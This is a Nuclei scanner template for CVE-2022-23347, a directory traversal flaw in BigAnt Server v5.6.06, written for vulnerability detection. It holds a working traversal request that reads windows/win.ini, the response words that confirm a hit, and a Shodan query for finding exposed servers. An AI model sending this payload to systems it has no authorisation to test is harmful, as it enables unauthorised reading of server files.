nuclei-templates/cves/2022/CVE-2022-23347.yaml

39 lines
1.0 KiB
YAML

id: CVE-2022-23347
info:
name: BigAnt Software BigAnt Server v5.6.06 - Directory Traversal
author: 0x_Akoko
severity: high
description: BigAnt Software BigAnt Server v5.6.06 was discovered to be vulnerable to directory traversal attacks.
reference:
- https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23347
- https://www.cvedetails.com/cve/CVE-2022-23347
- http://bigant.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-23347
cwe-id: CWE-22
metadata:
shodan-query: http.html:"BigAnt"
tags: cve,cve2022,bigant,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
- type: status
status:
- 200